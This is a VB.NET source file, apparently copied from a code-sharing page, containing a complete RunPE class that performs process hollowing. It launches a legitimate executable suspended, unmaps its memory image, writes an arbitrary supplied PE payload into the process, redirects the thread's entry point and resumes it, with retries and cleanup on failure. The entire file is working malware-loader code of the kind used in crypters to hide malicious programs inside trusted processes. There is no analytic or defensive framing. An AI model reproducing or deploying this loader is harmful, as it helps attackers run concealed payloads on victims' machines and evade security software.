Imports System.Runtime.InteropServicesImports System.ThreadingImports System

1. Imports System.Runtime.InteropServices
2. Imports System.Threading
3. Imports System.Reflection
4. Imports System.Text
5. Imports System.Security
6. Imports System.Diagnostics
7.  
8.  
9.  
10. Class RunPE
11.  
12.  
13. <DllImport("kernel32.dll", EntryPoint:="CreateProcess", CharSet:=CharSet.Unicode), SuppressUnmanagedCodeSecurity> _
14. Private Shared Function CreateProcess( _
15. ByVal applicationName As String, _
16. ByVal commandLine As String, _
17. ByVal processAttributes As IntPtr, _
18. ByVal threadAttributes As IntPtr, _
19. ByVal inheritHandles As Boolean, _
20. ByVal creationFlags As UInteger, _
21. ByVal environment As IntPtr, _
22. ByVal currentDirectory As String, _
23. ByRef startupInfo As STARTUP_INFORMATION, _
24. ByRef processInformation As PROCESS_INFORMATION) As Boolean
25. End Function
26.  
27. <DllImport("kernel32.dll", EntryPoint:="GetThreadContext"), SuppressUnmanagedCodeSecurity> _
28. Private Shared Function GetThreadContext( _
29. ByVal thread As IntPtr, _
30. ByVal context As Integer()) As Boolean
31. End Function
32.  
33. <DllImport("kernel32.dll", EntryPoint:="SetThreadContext"), SuppressUnmanagedCodeSecurity> _
34. Private Shared Function SetThreadContext( _
35. ByVal thread As IntPtr, _
36. ByVal context As Integer()) As Boolean
37. End Function
38.  
39. <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory"), SuppressUnmanagedCodeSecurity> _
40. Private Shared Function ReadProcessMemory( _
41. ByVal process As IntPtr, _
42. ByVal baseAddress As Integer, _
43. ByRef buffer As Integer, _
44. ByVal bufferSize As Integer, _
45. ByRef bytesRead As Integer) As Boolean
46. End Function
47.  
48. <DllImport("kernel32.dll", EntryPoint:="WriteProcessMemory"), SuppressUnmanagedCodeSecurity> _
49. Private Shared Function WriteProcessMemory( _
50. ByVal process As IntPtr, _
51. ByVal baseAddress As Integer, _
52. ByVal buffer As Byte(), _
53. ByVal bufferSize As Integer, _
54. ByRef bytesWritten As Integer) As Boolean
55. End Function
56.  
57. <DllImport("ntdll.dll", EntryPoint:="NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity> _
58. Private Shared Function NtUnmapViewOfSection( _
59. ByVal process As IntPtr, _
60. ByVal baseAddress As Integer) As Integer
61. End Function
62.  
63. <DllImport("kernel32.dll", EntryPoint:="VirtualAllocEx"), SuppressUnmanagedCodeSecurity> _
64. Private Shared Function VirtualAllocEx( _
65. ByVal handle As IntPtr, _
66. ByVal address As Integer, _
67. ByVal length As Integer, _
68. ByVal type As Integer, _
69. ByVal protect As Integer) As Integer
70. End Function
71.  
72. <DllImport("kernel32.dll", EntryPoint:="ResumeThread"), SuppressUnmanagedCodeSecurity> _
73. Private Shared Function ResumeThread( _
74. ByVal handle As IntPtr) As Integer
75. End Function
76.  
77. <StructLayout(LayoutKind.Sequential, Pack:=1)> _
78. Private Structure PROCESS_INFORMATION
79. Public ProcessHandle As IntPtr
80. Public ThreadHandle As IntPtr
81. Public ProcessId As UInteger
82. Public ThreadId As UInteger
83. End Structure
84.  
85. <StructLayout(LayoutKind.Sequential, Pack:=1)> _
86. Private Structure STARTUP_INFORMATION
87. Public Size As UInteger
88. Public Reserved1 As String
89. Public Desktop As String
90. Public Title As String
91.  
92. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=36)> _
93. Public Misc As Byte()
94.  
95. Public Reserved2 As IntPtr
96. Public StdInput As IntPtr
97. Public StdOutput As IntPtr
98. Public StdError As IntPtr
99.  
100. End Structure
101.  
102. Public Shared Function Run(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
103. For I As Integer = 1 To 5
104. If HandleRun(path, cmd, data, compatible) Then Return True
105. Next
106.  
107. Return False
108. End Function
109.  
110. Private Shared Function HandleRun(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
111.  
112. Dim ReadWrite As Integer
113. Dim QuotedPath As String = String.Format("""{0}""", path)
114.  
115. Dim SI As New STARTUP_INFORMATION
116. Dim PI As New PROCESS_INFORMATION
117.  
118. SI.Size = CUInt(Marshal.SizeOf(GetType(STARTUP_INFORMATION)))
119.  
120. Try
121. If String.IsNullOrEmpty(cmd) Then
122. If Not CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, SI, PI) Then Throw New Exception()
123. Else
124. QuotedPath = QuotedPath & " " & cmd
125. If Not CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, SI, PI) Then Throw New Exception()
126. End If
127.  
128. Dim FileAddress As Integer = BitConverter.ToInt32(data, 60)
129. Dim ImageBase As Integer = BitConverter.ToInt32(data, FileAddress + 52)
130.  
131. Dim Context(179 - 1) As Integer
132. Context(0) = 65538
133.  
134. If Not GetThreadContext(PI.ThreadHandle, Context) Then Throw New Exception()
135.  
136. Dim Ebx As Integer = Context(41)
137. Dim BaseAddress As Integer
138.  
139. If Not ReadProcessMemory(PI.ProcessHandle, Ebx + 8, BaseAddress, 4, ReadWrite) Then Throw New Exception()
140.  
141. If ImageBase = BaseAddress Then
142. If Not NtUnmapViewOfSection(PI.ProcessHandle, BaseAddress) = 0 Then Throw New Exception()
143. End If
144.  
145. Dim SizeOfImage As Integer = BitConverter.ToInt32(data, FileAddress + 80)
146. Dim SizeOfHeaders As Integer = BitConverter.ToInt32(data, FileAddress + 84)
147.  
148. Dim AllowOverride As Boolean
149. Dim NewImageBase As Integer = VirtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64)
150.  
151. If Not compatible AndAlso NewImageBase = 0 Then
152. AllowOverride = True
153. NewImageBase = VirtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64)
154. End If
155.  
156. If NewImageBase = 0 Then Throw New Exception()
157.  
158. If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ReadWrite) Then Throw New Exception()
159.  
160. Dim SectionOffset As Integer = FileAddress + 248
161. Dim NumberOfSections As Short = BitConverter.ToInt16(data, FileAddress + 6)
162.  
163. For I As Integer = 0 To NumberOfSections - 1
164. Dim VirtualAddress As Integer = BitConverter.ToInt32(data, SectionOffset + 12)
165. Dim SizeOfRawData As Integer = BitConverter.ToInt32(data, SectionOffset + 16)
166. Dim PointerToRawData As Integer = BitConverter.ToInt32(data, SectionOffset + 20)
167.  
168. If Not SizeOfRawData = 0 Then
169. Dim SectionData(SizeOfRawData - 1) As Byte
170. Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length)
171.  
172. If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
173. End If
174.  
175. SectionOffset += 40
176. Next
177.  
178. Dim PointerData As Byte() = BitConverter.GetBytes(NewImageBase)
179. If Not WriteProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ReadWrite) Then Throw New Exception()
180.  
181. Dim AddressOfEntryPoint As Integer = BitConverter.ToInt32(data, FileAddress + 40)
182.  
183. If AllowOverride Then NewImageBase = ImageBase
184. Context(44) = NewImageBase + AddressOfEntryPoint
185.  
186. If Not SetThreadContext(PI.ThreadHandle, Context) Then Throw New Exception()
187. If ResumeThread(PI.ThreadHandle) = -1 Then Throw New Exception()
188.  
189.  
190. Catch
191.  
192. Dim P As Process = Process.GetProcessById(CInt(PI.ProcessId))
193. If P IsNot Nothing Then P.Kill()
194.  
195. Return False
196.  
197. End Try
198.  
199. Return True
200.  
201. End Function
202.  
203. End Class